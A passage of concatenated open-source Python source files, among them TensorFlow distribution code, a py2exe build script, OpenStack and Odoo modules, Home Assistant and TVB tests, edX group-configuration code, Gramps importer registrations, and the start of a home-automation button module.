validate_args=validate_args, allow_nan_stats=self._dist.allow_nan_stats, parameters=parameters, graph_parents=graph_parents, name=name) @property def distribution(self): """Base distribution, p(x).""" return self._dist @property def low(self): """Lowest value that quantization returns.""" return self._low @property def high(self): """Highest value that quantization returns.""" return self._high def _batch_shape_tensor(self): return self.distribution.batch_shape_tensor() def _batch_shape(self): return self.distribution.batch_shape def _event_shape_tensor(self): return self.distribution.event_shape_tensor() def _event_shape(self): return self.distribution.event_shape def _sample_n(self, n, seed=None): low = self._low high = self._high with ops.name_scope("transform"): n = ops.convert_to_tensor(n, name="n") x_samps = self.distribution.sample(n, seed=seed) ones = array_ops.ones_like(x_samps) # Snap values to the intervals (j - 1, j]. result_so_far = math_ops.ceil(x_samps) if low is not None: result_so_far = array_ops.where(result_so_far < low, low * ones, result_so_far) if high is not None: result_so_far = array_ops.where(result_so_far > high, high * ones, result_so_far) return result_so_far @distribution_util.AppendDocstring(_log_prob_note) def _log_prob(self, y): if not hasattr(self.distribution, "_log_cdf"): raise NotImplementedError( "'log_prob' not implemented unless the base distribution implements " "'log_cdf'") y = self._check_integer(y) try: return self._log_prob_with_logsf_and_logcdf(y) except NotImplementedError: return self._log_prob_with_logcdf(y) def _log_prob_with_logcdf(self, y): return _logsum_expbig_minus_expsmall(self.log_cdf(y), self.log_cdf(y - 1)) def _log_prob_with_logsf_and_logcdf(self, y): """Compute log_prob(y) using log survival_function and cdf together.""" # There are two options that would be equal if we had infinite precision: # Log[ sf(y - 1) - sf(y) ] # = Log[ exp{logsf(y - 1)} - exp{logsf(y)} ] # Log[ cdf(y) - cdf(y - 1) ] # = Log[ exp{logcdf(y)} - exp{logcdf(y - 1)} ] logsf_y = self.log_survival_function(y) logsf_y_minus_1 = self.log_survival_function(y - 1) logcdf_y = self.log_cdf(y) logcdf_y_minus_1 = self.log_cdf(y - 1) # Important: Here we use select in a way such that no input is inf, this # prevents the troublesome case where the output of select can be finite, # but the output of grad(select) will be NaN. # In either case, we are doing Log[ exp{big} - exp{small} ] # We want to use the sf items precisely when we are on the right side of the # median, which occurs when logsf_y < logcdf_y. big = array_ops.where(logsf_y < logcdf_y, logsf_y_minus_1, logcdf_y) small = array_ops.where(logsf_y < logcdf_y, logsf_y, logcdf_y_minus_1) return _logsum_expbig_minus_expsmall(big, small) @distribution_util.AppendDocstring(_prob_note) def _prob(self, y): if not hasattr(self.distribution, "_cdf"): raise NotImplementedError( "'prob' not implemented unless the base distribution implements " "'cdf'") y = self._check_integer(y) try: return self._prob_with_sf_and_cdf(y) except NotImplementedError: return self._prob_with_cdf(y) def _prob_with_cdf(self, y): return self.cdf(y) - self.cdf(y - 1) def _prob_with_sf_and_cdf(self, y): # There are two options that would be equal if we had infinite precision: # sf(y - 1) - sf(y) # cdf(y) - cdf(y - 1) sf_y = self.survival_function(y) sf_y_minus_1 = self.survival_function(y - 1) cdf_y = self.cdf(y) cdf_y_minus_1 = self.cdf(y - 1) # sf_prob has greater precision iff we're on the right side of the median. return array_ops.where( sf_y < cdf_y, # True iff we're on the right side of the median. sf_y_minus_1 - sf_y, cdf_y - cdf_y_minus_1) @distribution_util.AppendDocstring(_log_cdf_note) def _log_cdf(self, y): low = self._low high = self._high # Recall the promise: # cdf(y) := P[Y <= y] # = 1, if y >= high, # = 0, if y < low, # = P[X <= y], otherwise. # P[Y <= j] = P[floor(Y) <= j] since mass is only at integers, not in # between. j = math_ops.floor(y) result_so_far = self.distribution.log_cdf(j) # Broadcast, because it's possible that this is a single distribution being # evaluated on a number of samples, or something like that. j += array_ops.zeros_like(result_so_far) # Re-define values at the cutoffs. if low is not None: neg_inf = -np.inf * array_ops.ones_like(result_so_far) result_so_far = array_ops.where(j < low, neg_inf, result_so_far) if high is not None: result_so_far = array_ops.where(j >= high, array_ops.zeros_like(result_so_far), result_so_far) return result_so_far @distribution_util.AppendDocstring(_cdf_note) def _cdf(self, y): low = self._low high = self._high # Recall the promise: # cdf(y) := P[Y <= y] # = 1, if y >= high, # = 0, if y < low, # = P[X <= y], otherwise. # P[Y <= j] = P[floor(Y) <= j] since mass is only at integers, not in # between. j = math_ops.floor(y) # P[X <= j], used when low < X < high. result_so_far = self.distribution.cdf(j) # Broadcast, because it's possible that this is a single distribution being # evaluated on a number of samples, or something like that. j += array_ops.zeros_like(result_so_far) # Re-define values at the cutoffs. if low is not None: result_so_far = array_ops.where(j < low, array_ops.zeros_like(result_so_far), result_so_far) if high is not None: result_so_far = array_ops.where(j >= high, array_ops.ones_like(result_so_far), result_so_far) return result_so_far @distribution_util.AppendDocstring(_log_sf_note) def _log_survival_function(self, y): low = self._low high = self._high # Recall the promise: # survival_function(y) := P[Y > y] # = 0, if y >= high, # = 1, if y < low, # = P[X > y], otherwise. # P[Y > j] = P[ceiling(Y) > j] since mass is only at integers, not in # between. j = math_ops.ceil(y) # P[X > j], used when low < X < high. result_so_far = self.distribution.log_survival_function(j) # Broadcast, because it's possible that this is a single distribution being # evaluated on a number of samples, or something like that. j += array_ops.zeros_like(result_so_far) # Re-define values at the cutoffs. if low is not None: result_so_far = array_ops.where(j < low, array_ops.zeros_like(result_so_far), result_so_far) if high is not None: neg_inf = -np.inf * array_ops.ones_like(result_so_far) result_so_far = array_ops.where(j >= high, neg_inf, result_so_far) return result_so_far @distribution_util.AppendDocstring(_sf_note) def _survival_function(self, y): low = self._low high = self._high # Recall the promise: # survival_function(y) := P[Y > y] # = 0, if y >= high, # = 1, if y < low, # = P[X > y], otherwise. # P[Y > j] = P[ceiling(Y) > j] since mass is only at integers, not in # between. j = math_ops.ceil(y) # P[X > j], used when low < X < high. result_so_far = self.distribution.survival_function(j) # Broadcast, because it's possible that this is a single distribution being # evaluated on a number of samples, or something like that. j += array_ops.zeros_like(result_so_far) # Re-define values at the cutoffs. if low is not None: result_so_far = array_ops.where(j < low, array_ops.ones_like(result_so_far), result_so_far) if high is not None: result_so_far = array_ops.where(j >= high, array_ops.zeros_like(result_so_far), result_so_far) return result_so_far def _check_integer(self, value): with ops.name_scope("check_integer", values=[value]): value = ops.convert_to_tensor(value, name="value") if not self.validate_args: return value dependencies = [distribution_util.assert_integer_form( value, message="value has non-integer components.")] return control_flow_ops.with_dependencies(dependencies, value)
apache-2.0
imiolek-ireneusz/eduActiv8
eduactiv82exe.py
1
6732
# -*- coding: utf8 -*- # This will create a dist directory containing the executable file, all the data # directories. All Libraries will be bundled in executable file. # # Run the build process by entering 'pygame2exe.py' or # 'python pygame2exe.py' in a console prompt. # # To build exe, python, pygame, and py2exe have to be installed. After # building exe none of this libraries are needed. # Please Note have a backup file in a different directory as if it crashes you # will loose it all!(I lost 6 months of work because I did not do this) # http://pygame.org/wiki/Pygame2exe try: from distutils.core import setup import py2exe, pygame from modulefinder import Module import glob, fnmatch import sys, os, shutil import operator import appdirs import packaging except ImportError, message: raise SystemExit, "Unable to load module. %s" % message # hack which fixes the pygame mixer and pygame font origIsSystemDLL = py2exe.build_exe.isSystemDLL # save the orginal before we edit it def isSystemDLL(pathname): # checks if the freetype and ogg dll files are being included if os.path.basename(pathname).lower() in ( "libfreetype-6.dll", "libogg-0.dll", "sdl_ttf.dll"): # "sdl_ttf.dll" added by arit. return 0 return origIsSystemDLL(pathname) # return the orginal function py2exe.build_exe.isSystemDLL = isSystemDLL # override the default function with this one class pygame2exe( py2exe.build_exe.py2exe): # This hack make sure that pygame default font is copied: no need to modify code for specifying default font def copy_extensions(self, extensions): # Get pygame default font pygamedir = os.path.split(pygame.base.__file__)[0] pygame_default_font = os.path.join(pygamedir, pygame.font.get_default_font()) # Add font to list of extension to be copied extensions.append(Module("pygame.font", pygame_default_font)) py2exe.build_exe.py2exe.copy_extensions(self, extensions) class BuildExe: def __init__(self): # Name of starting .py self.script = "eduactiv8.py" # Name of program self.project_name = "eduActiv8" # Project url self.project_url = "https://www.eduactiv8.org" # Version of program self.project_version = "1.0" # License of the program self.license = "GPL3" # Auhor of program self.author_name = "Ireneusz Imiolek" self.author_email = "[email protected]" self.copyright = "Copyright (c) 2012-2019 Ireneusz Imiolek" # Description self.project_description = "eduActiv8 - Educational Activities for Kids" # Icon file (None will use pygame default icon) self.icon_file = os.path.join("res", "icon", "eduactiv8.ico") # Extra files/dirs copied to game self.extra_datas = ["classes", "game_boards", "i18n", "locale", "res", "xml"] # Extra/excludes python modules self.extra_modules = ['appdirs', 'packaging'] # showed missing in result compilation self.exclude_modules = [] # DLL Excludes self.exclude_dll = [''] # python scripts (strings) to be included, seperated by a comma self.extra_scripts = [] # Zip file name (None will bundle files in exe instead of zip file) self.zipfile_name = None # Dist directory self.dist_dir = 'dist' # Code from DistUtils tutorial at http://wiki.python.org/moin/Distutils/Tutorial # Originally borrowed from wxPython's setup and config files def opj(self, *args): path = os.path.join(*args) return os.path.normpath(path) def find_data_files(self, srcdir, *wildcards, **kw): # get a list of all files under the srcdir matching wildcards, # returned in a format to be used for install_data def walk_helper(arg, dirname, files): if '.svn' in dirname: return names = [] lst, wildcards = arg for wc in wildcards: wc_name = self.opj(dirname, wc) for f in files: filename = self.opj(dirname, f) if fnmatch.fnmatch(filename, wc_name) and not os.path.isdir(filename): names.append(filename) if names: lst.append((dirname, names)) file_list = [] recursive = kw.get('recursive', True) if recursive: os.path.walk(srcdir, walk_helper, (file_list, wildcards)) else: walk_helper((file_list, wildcards), srcdir, [os.path.basename(f) for f in glob.glob(self.opj(srcdir, '*'))]) return file_list def run(self): if os.path.isdir(self.dist_dir): # Erase previous destination dir shutil.rmtree(self.dist_dir) # Use the default pygame icon, if none given if self.icon_file is None: path = os.path.split(pygame.__file__)[0] self.icon_file = os.path.join(path, 'pygame.ico') # List all data files to add extra_datas = ["__init__.py", "CHANGES.txt", "CREDITS.txt", "eduactiv8.py", "LICENSE", "README.txt"] for data in self.extra_datas: if os.path.isdir(data): extra_datas.extend(self.find_data_files(data, '*')) else: extra_datas.append(('.', [data])) setup( cmdclass={'py2exe': pygame2exe}, version=self.project_version, description=self.project_description, name=self.project_name, url=self.project_url, author=self.author_name, author_email=self.author_email, license=self.license, # targets to build # console = [{ windows=[{ 'script': self.script, 'icon_resources': [(0, self.icon_file)], 'copyright': self.copyright }], options={'py2exe': {'optimize': 2, 'bundle_files': 1, 'compressed': True, 'excludes': self.exclude_modules, 'packages': self.extra_modules, 'dll_excludes': self.exclude_dll, 'includes': self.extra_scripts}}, zipfile=self.zipfile_name, data_files=extra_datas, dist_dir=self.dist_dir ) if os.path.isdir('build'): # Clean up build dir shutil.rmtree('build') if __name__ == '__main__': if operator.lt(len(sys.argv), 2): sys.argv.append('py2exe') BuildExe().run() # Run generation
gpl-3.0
moylop260/odoo-dev
addons/hr_timesheet_invoice/wizard/__init__.py
433
1159
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import hr_timesheet_invoice_create import hr_timesheet_analytic_profit import hr_timesheet_final_invoice_create # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
ChinaMassClouds/copenstack-server
openstack/src/nova-2014.2/nova/api/openstack/compute/contrib/createserverext.py
100
1156
# Copyright 2011 OpenStack Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from nova.api.openstack import extensions class Createserverext(extensions.ExtensionDescriptor): """Extended support to the Create Server v1.1 API.""" name = "Createserverext" alias = "os-create-server-ext" namespace = ("http://docs.openstack.org/compute/ext/" "createserverext/api/v1.1") updated = "2011-07-19T00:00:00Z" def get_resources(self): res = extensions.ResourceExtension('os-create-server-ext', inherits='servers') return [res]
gpl-2.0
srcLurker/home-assistant
tests/components/test_input_boolean.py
15
3095
"""The tests for the input_boolean component.""" # pylint: disable=protected-access import unittest import logging from tests.common import get_test_home_assistant from homeassistant.bootstrap import setup_component from homeassistant.components.input_boolean import ( DOMAIN, is_on, toggle, turn_off, turn_on) from homeassistant.const import ( STATE_ON, STATE_OFF, ATTR_ICON, ATTR_FRIENDLY_NAME) _LOGGER = logging.getLogger(__name__) class TestInputBoolean(unittest.TestCase): """Test the input boolean module.""" # pylint: disable=invalid-name def setUp(self): """Setup things to be run when tests are started.""" self.hass = get_test_home_assistant() # pylint: disable=invalid-name def tearDown(self): """Stop everything that was started.""" self.hass.stop() def test_config(self): """Test config.""" invalid_configs = [ None, 1, {}, {'name with space': None}, ] for cfg in invalid_configs: self.assertFalse( setup_component(self.hass, DOMAIN, {DOMAIN: cfg})) def test_methods(self): """Test is_on, turn_on, turn_off methods.""" self.assertTrue(setup_component(self.hass, DOMAIN, {DOMAIN: { 'test_1': None, }})) entity_id = 'input_boolean.test_1' self.assertFalse( is_on(self.hass, entity_id)) turn_on(self.hass, entity_id) self.hass.block_till_done() self.assertTrue( is_on(self.hass, entity_id)) turn_off(self.hass, entity_id) self.hass.block_till_done() self.assertFalse( is_on(self.hass, entity_id)) toggle(self.hass, entity_id) self.hass.block_till_done() self.assertTrue(is_on(self.hass, entity_id)) def test_config_options(self): """Test configuration options.""" count_start = len(self.hass.states.entity_ids()) _LOGGER.debug('ENTITIES @ start: %s', self.hass.states.entity_ids()) self.assertTrue(setup_component(self.hass, DOMAIN, {DOMAIN: { 'test_1': None, 'test_2': { 'name': 'Hello World', 'icon': 'mdi:work', 'initial': True, }, }})) _LOGGER.debug('ENTITIES: %s', self.hass.states.entity_ids()) self.assertEqual(count_start + 2, len(self.hass.states.entity_ids())) state_1 = self.hass.states.get('input_boolean.test_1') state_2 = self.hass.states.get('input_boolean.test_2') self.assertIsNotNone(state_1) self.assertIsNotNone(state_2) self.assertEqual(STATE_OFF, state_1.state) self.assertNotIn(ATTR_ICON, state_1.attributes) self.assertNotIn(ATTR_FRIENDLY_NAME, state_1.attributes) self.assertEqual(STATE_ON, state_2.state) self.assertEqual('Hello World', state_2.attributes.get(ATTR_FRIENDLY_NAME)) self.assertEqual('mdi:work', state_2.attributes.get(ATTR_ICON))
mit
echohenry2006/tvb-library
tvb/tests/library/simulator/noise_test.py
3
2676
# -*- coding: utf-8 -*- # # # TheVirtualBrain-Scientific Package. This package holds all simulators, and # analysers necessary to run brain-simulations. You can use it stand alone or # in conjunction with TheVirtualBrain-Framework Package. See content of the # documentation-folder for more details. See also http://www.thevirtualbrain.org # # (c) 2012-2013, Baycrest Centre for Geriatric Care ("Baycrest") # # This program is free software; you can redistribute it and/or modify it under # the terms of the GNU General Public License version 2 as published by the Free # Software Foundation. This program is distributed in the hope that it will be # useful, but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public # License for more details. You should have received a copy of the GNU General # Public License along with this program; if not, you can download it here # http://www.gnu.org/licenses/old-licenses/gpl-2.0 # # # CITATION: # When using The Virtual Brain for scientific publications, please cite it as follows: # # Paula Sanz Leon, Stuart A. Knock, M. Marmaduke Woodman, Lia Domide, # Jochen Mersmann, Anthony R. McIntosh, Viktor Jirsa (2013) # The Virtual Brain: a simulator of primate brain network dynamics. # Frontiers in Neuroinformatics (7:10. doi: 10.3389/fninf.2013.00010) # # """ Test for tvb.simulator.noise module .. moduleauthor:: Paula Sanz Leon <[email protected]> """ if __name__ == "__main__": from tvb.tests.library import setup_test_console_env setup_test_console_env() import unittest from tvb.tests.library.base_testcase import BaseTestCase from tvb.simulator import noise from tvb.datatypes import equations class NoiseTest(BaseTestCase): def test_stream(self): noise_stream = noise.RandomStream() self.assertEqual(noise_stream.init_seed, 42) def test_additive(self): noise_additive = noise.Additive() self.assertEqual(noise_additive.ntau, 0.0) def test_multiplicative(self): noise_multiplicative = noise.Multiplicative() self.assertEqual(noise_multiplicative.ntau, 0.0) self.assertTrue(isinstance(noise_multiplicative.b, equations.Linear)) def suite(): """ Gather all the tests in a test suite. """ test_suite = unittest.TestSuite() test_suite.addTest(unittest.makeSuite(NoiseTest)) return test_suite if __name__ == "__main__": #So you can run tests from this package individually. TEST_RUNNER = unittest.TextTestRunner() TEST_SUITE = suite() TEST_RUNNER.run(TEST_SUITE)
gpl-2.0
iivic/BoiseStateX
cms/djangoapps/contentstore/course_group_config.py
70
13178
""" Class for manipulating groups configuration on a course object. """ import json import logging from util.db import generate_int_id, MYSQL_MAX_INT from django.utils.translation import ugettext as _ from contentstore.utils import reverse_usage_url from xmodule.partitions.partitions import UserPartition from xmodule.split_test_module import get_split_user_partitions from openedx.core.djangoapps.course_groups.partition_scheme import get_cohorted_user_partition MINIMUM_GROUP_ID = 100 RANDOM_SCHEME = "random" COHORT_SCHEME = "cohort" # Note: the following content group configuration strings are not # translated since they are not visible to users. CONTENT_GROUP_CONFIGURATION_DESCRIPTION = 'The groups in this configuration can be mapped to cohort groups in the LMS.' CONTENT_GROUP_CONFIGURATION_NAME = 'Content Group Configuration' log = logging.getLogger(__name__) class GroupConfigurationsValidationError(Exception): """ An error thrown when a group configurations input is invalid. """ pass class GroupConfiguration(object): """ Prepare Group Configuration for the course. """ def __init__(self, json_string, course, configuration_id=None): """ Receive group configuration as a json (`json_string`), deserialize it and validate. """ self.configuration = GroupConfiguration.parse(json_string) self.course = course self.assign_id(configuration_id) self.assign_group_ids() self.validate() @staticmethod def parse(json_string): """ Deserialize given json that represents group configuration. """ try: configuration = json.loads(json_string) except ValueError: raise GroupConfigurationsValidationError(_("invalid JSON")) configuration["version"] = UserPartition.VERSION return configuration def validate(self): """ Validate group configuration representation. """ if not self.configuration.get("name"): raise GroupConfigurationsValidationError(_("must have name of the configuration")) if len(self.configuration.get('groups', [])) < 1: raise GroupConfigurationsValidationError(_("must have at least one group")) def assign_id(self, configuration_id=None): """ Assign id for the json representation of group configuration. """ if configuration_id: self.configuration['id'] = int(configuration_id) else: self.configuration['id'] = generate_int_id( MINIMUM_GROUP_ID, MYSQL_MAX_INT, GroupConfiguration.get_used_ids(self.course) ) def assign_group_ids(self): """ Assign ids for the group_configuration's groups. """ used_ids = [g.id for p in self.course.user_partitions for g in p.groups] # Assign ids to every group in configuration. for group in self.configuration.get('groups', []): if group.get('id') is None: group["id"] = generate_int_id(MINIMUM_GROUP_ID, MYSQL_MAX_INT, used_ids) used_ids.append(group["id"]) @staticmethod def get_used_ids(course): """ Return a list of IDs that already in use. """ return set([p.id for p in course.user_partitions]) def get_user_partition(self): """ Get user partition for saving in course. """ return UserPartition.from_json(self.configuration) @staticmethod def _get_usage_info(course, unit, item, usage_info, group_id, scheme_name=None): """ Get usage info for unit/module. """ unit_url = reverse_usage_url( 'container_handler', course.location.course_key.make_usage_key(unit.location.block_type, unit.location.name) ) usage_dict = {'label': u"{} / {}".format(unit.display_name, item.display_name), 'url': unit_url} if scheme_name == RANDOM_SCHEME: validation_summary = item.general_validation_message() usage_dict.update({'validation': validation_summary.to_json() if validation_summary else None}) usage_info[group_id].append(usage_dict) return usage_info @staticmethod def get_content_experiment_usage_info(store, course): """ Get usage information for all Group Configurations currently referenced by a split_test instance. """ split_tests = store.get_items(course.id, qualifiers={'category': 'split_test'}) return GroupConfiguration._get_content_experiment_usage_info(store, course, split_tests) @staticmethod def get_split_test_partitions_with_usage(store, course): """ Returns json split_test group configurations updated with usage information. """ usage_info = GroupConfiguration.get_content_experiment_usage_info(store, course) configurations = [] for partition in get_split_user_partitions(course.user_partitions): configuration = partition.to_json() configuration['usage'] = usage_info.get(partition.id, []) configurations.append(configuration) return configurations @staticmethod def _get_content_experiment_usage_info(store, course, split_tests): # pylint: disable=unused-argument """ Returns all units names, their urls and validation messages. Returns: {'user_partition_id': [ { 'label': 'Unit 1 / Experiment 1', 'url': 'url_to_unit_1', 'validation': {'message': 'a validation message', 'type': 'warning'} }, { 'label': 'Unit 2 / Experiment 2', 'url': 'url_to_unit_2', 'validation': {'message': 'another validation message', 'type': 'error'} } ], } """ usage_info = {} for split_test in split_tests: if split_test.user_partition_id not in usage_info: usage_info[split_test.user_partition_id] = [] unit = split_test.get_parent() if not unit: log.warning("Unable to find parent for split_test %s", split_test.location) continue usage_info = GroupConfiguration._get_usage_info( course=course, unit=unit, item=split_test, usage_info=usage_info, group_id=split_test.user_partition_id, scheme_name=RANDOM_SCHEME ) return usage_info @staticmethod def get_content_groups_usage_info(store, course): """ Get usage information for content groups. """ items = store.get_items(course.id, settings={'group_access': {'$exists': True}}) return GroupConfiguration._get_content_groups_usage_info(course, items) @staticmethod def _get_content_groups_usage_info(course, items): """ Returns all units names and their urls. This will return only groups for the cohort user partition. Returns: {'group_id': [ { 'label': 'Unit 1 / Problem 1', 'url': 'url_to_unit_1' }, { 'label': 'Unit 2 / Problem 2', 'url': 'url_to_unit_2' } ], } """ usage_info = {} for item, group_id in GroupConfiguration._iterate_items_and_content_group_ids(course, items): if group_id not in usage_info: usage_info[group_id] = [] unit = item.get_parent() if not unit: log.warning("Unable to find parent for component %s", item.location) continue usage_info = GroupConfiguration._get_usage_info( course, unit=unit, item=item, usage_info=usage_info, group_id=group_id ) return usage_info @staticmethod def get_content_groups_items_usage_info(store, course): """ Get usage information on items for content groups. """ items = store.get_items(course.id, settings={'group_access': {'$exists': True}}) return GroupConfiguration._get_content_groups_items_usage_info(course, items) @staticmethod def _get_content_groups_items_usage_info(course, items): """ Returns all items names and their urls. This will return only groups for the cohort user partition. Returns: {'group_id': [ { 'label': 'Problem 1 / Problem 1', 'url': 'url_to_item_1' }, { 'label': 'Problem 2 / Problem 2', 'url': 'url_to_item_2' } ], } """ usage_info = {} for item, group_id in GroupConfiguration._iterate_items_and_content_group_ids(course, items): if group_id not in usage_info: usage_info[group_id] = [] usage_info = GroupConfiguration._get_usage_info( course, unit=item, item=item, usage_info=usage_info, group_id=group_id ) return usage_info @staticmethod def _iterate_items_and_content_group_ids(course, items): """ Iterate through items and content group IDs in a course. This will yield group IDs *only* for cohort user partitions. Yields: tuple of (item, group_id) """ content_group_configuration = get_cohorted_user_partition(course) if content_group_configuration is not None: for item in items: if hasattr(item, 'group_access') and item.group_access: group_ids = item.group_access.get(content_group_configuration.id, []) for group_id in group_ids: yield item, group_id @staticmethod def update_usage_info(store, course, configuration): """ Update usage information for particular Group Configuration. Returns json of particular group configuration updated with usage information. """ configuration_json = None # Get all Experiments that use particular Group Configuration in course. if configuration.scheme.name == RANDOM_SCHEME: split_tests = store.get_items( course.id, category='split_test', content={'user_partition_id': configuration.id} ) configuration_json = configuration.to_json() usage_information = GroupConfiguration._get_content_experiment_usage_info(store, course, split_tests) configuration_json['usage'] = usage_information.get(configuration.id, []) elif configuration.scheme.name == COHORT_SCHEME: # In case if scheme is "cohort" configuration_json = GroupConfiguration.update_content_group_usage_info(store, course, configuration) return configuration_json @staticmethod def update_content_group_usage_info(store, course, configuration): """ Update usage information for particular Content Group Configuration. Returns json of particular content group configuration updated with usage information. """ usage_info = GroupConfiguration.get_content_groups_usage_info(store, course) content_group_configuration = configuration.to_json() for group in content_group_configuration['groups']: group['usage'] = usage_info.get(group['id'], []) return content_group_configuration @staticmethod def get_or_create_content_group(store, course): """ Returns the first user partition from the course which uses the CohortPartitionScheme, or generates one if no such partition is found. The created partition is not saved to the course until the client explicitly creates a group within the partition and POSTs back. """ content_group_configuration = get_cohorted_user_partition(course) if content_group_configuration is None: content_group_configuration = UserPartition( id=generate_int_id(MINIMUM_GROUP_ID, MYSQL_MAX_INT, GroupConfiguration.get_used_ids(course)), name=CONTENT_GROUP_CONFIGURATION_NAME, description=CONTENT_GROUP_CONFIGURATION_DESCRIPTION, groups=[], scheme_id=COHORT_SCHEME ) return content_group_configuration.to_json() content_group_configuration = GroupConfiguration.update_content_group_usage_info( store, course, content_group_configuration ) return content_group_configuration
agpl-3.0
Fedik/gramps
gramps/plugins/importer/import.gpr.py
4
5381
# # Gramps - a GTK+/GNOME based genealogy program # # Copyright (C) 2009 Benny Malengier # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. # from gramps.gen.plug._pluginreg import newplugin, STABLE, IMPORT from gramps.gen.const import GRAMPS_LOCALE as glocale _ = glocale.translation.gettext MODULE_VERSION="5.2" #------------------------------------------------------------------------ # # Comma _Separated Values Spreadsheet (CSV) # #------------------------------------------------------------------------ _mime_type = "text/x-comma-separated-values" # CSV Document _mime_type_rfc_4180 = "text/csv" # CSV Document See rfc4180 for mime type plg = newplugin() plg.id = 'im_csv' plg.name = _("Comma Separated Values Spreadsheet (CSV)") plg.description = _("Import data from CSV files") plg.version = '1.0' plg.gramps_target_version = MODULE_VERSION plg.status = STABLE plg.fname = 'importcsv.py' plg.ptype = IMPORT plg.import_function = 'importData' plg.extension = "csv" #------------------------------------------------------------------------ # # GEDCOM # #------------------------------------------------------------------------ plg = newplugin() plg.id = 'im_ged' plg.name = _('GEDCOM') plg.description = _('GEDCOM is used to transfer data between genealogy programs. ' 'Most genealogy software will accept a GEDCOM file as input.') plg.version = '1.0' plg.gramps_target_version = MODULE_VERSION plg.status = STABLE plg.fname = 'importgedcom.py' plg.ptype = IMPORT plg.import_function = 'importData' plg.extension = "ged" #------------------------------------------------------------------------ # # Geneweb # #------------------------------------------------------------------------ plg = newplugin() plg.id = 'im_geneweb' plg.name = _('GeneWeb') plg.description = _('Import data from GeneWeb files') plg.version = '1.0' plg.gramps_target_version = MODULE_VERSION plg.status = STABLE plg.fname = 'importgeneweb.py' plg.ptype = IMPORT plg.import_function = 'importData' plg.extension = "gw" #------------------------------------------------------------------------ # # Gramps package (portable XML) # #------------------------------------------------------------------------ plg = newplugin() plg.id = 'im_gpkg' plg.name = _('Gramps package (portable XML)') plg.description = _('Import data from a Gramps package (an archived XML ' 'Family Tree together with the media object files.)') plg.version = '1.0' plg.gramps_target_version = MODULE_VERSION plg.status = STABLE plg.fname = 'importgpkg.py' plg.ptype = IMPORT plg.import_function = 'impData' plg.extension = "gpkg" #------------------------------------------------------------------------ # # Gramps XML database # #------------------------------------------------------------------------ plg = newplugin() plg.id = 'im_gramps' plg.name = _('Gramps XML Family Tree') plg.description = _('The Gramps XML format is a text ' 'version of a Family Tree. It is ' 'read-write compatible with the ' 'present Gramps database format.') plg.version = '1.0' plg.gramps_target_version = MODULE_VERSION plg.status = STABLE plg.fname = 'importxml.py' plg.ptype = IMPORT plg.import_function = 'importData' plg.extension = "gramps" #------------------------------------------------------------------------ # # GRDB database # #------------------------------------------------------------------------ plg = newplugin() plg.id = 'im_grdb' plg.name = _('Gramps 2.x database') plg.description = _('Import data from Gramps 2.x database files') plg.version = '1.0' plg.gramps_target_version = MODULE_VERSION plg.status = STABLE plg.fname = 'importgrdb.py' plg.ptype = IMPORT plg.import_function = 'importData' plg.extension = "grdb" #------------------------------------------------------------------------ # # Pro-Gen Files # #------------------------------------------------------------------------ plg = newplugin() plg.id = 'im_progen' plg.name = _('Pro-Gen') plg.description = _('Import data from Pro-Gen files') plg.version = '1.0' plg.gramps_target_version = MODULE_VERSION plg.status = STABLE plg.fname = 'importprogen.py' plg.ptype = IMPORT plg.import_function = '_importData' plg.extension = "def" #------------------------------------------------------------------------ # # vCard # #------------------------------------------------------------------------ plg = newplugin() plg.id = 'im_vcard' plg.name = _('vCard') plg.description = _('Import data from vCard files') plg.version = '1.0' plg.gramps_target_version = MODULE_VERSION plg.status = STABLE plg.fname = 'importvcard.py' plg.ptype = IMPORT plg.import_function = 'importData' plg.extension = "vcf"
gpl-2.0
deklungel/iRulez
src/button/_domain.py
1
29130
from enum import IntEnum import src.irulez.util as util from abc import ABC, abstractmethod import src.irulez.log as log from datetime import time from typing import List, Dict, Optional import src.irulez.constants as constants from threading import Timer logger = log.get_logger('button_domain') class ArduinoPinType(IntEnum): """Represents the purpose of a pin on an arduino""" BUTTON = 1 OUTPUT = 2 DIMMER = 3 class ActionType(IntEnum): """Represents what should happen. Toggle --> Relay H <-> L, On --> Relay H, Off --> Relay L, Follow_Button --> when button pressed -> relay H, dimmer --> dimmer""" TOGGLE = 1 ON = 2 OFF = 3 FOLLOW_BUTTON = 4 ON_DIMMER = 5 OFF_DIMMER = 6 TOGGLE_DIMMER = 7 class ActionTriggerType(IntEnum): """Represents when a action need to be executed""" IMMEDIATELY = 1 AFTER_RELEASE = 2 LONG_DOWN = 3 class Operator(IntEnum): AND = 1 OR = 2 class ConditionType(IntEnum): LIST = 1 OUTPUT_PIN = 2 TIME = 3 class ActionTrigger(ABC): def __init__(self, trigger_type: ActionTriggerType): self.trigger_type = trigger_type def get_action_trigger_type(self) -> ActionTriggerType: return self.trigger_type class Condition(ABC): def __init__(self, condition_type: ConditionType): self.condition_type = condition_type class Notification(ABC): def __init__(self, message: str, enabled: False): self.message = message self.enabled = enabled @abstractmethod def get_topic_name(self) -> str: pass @abstractmethod def 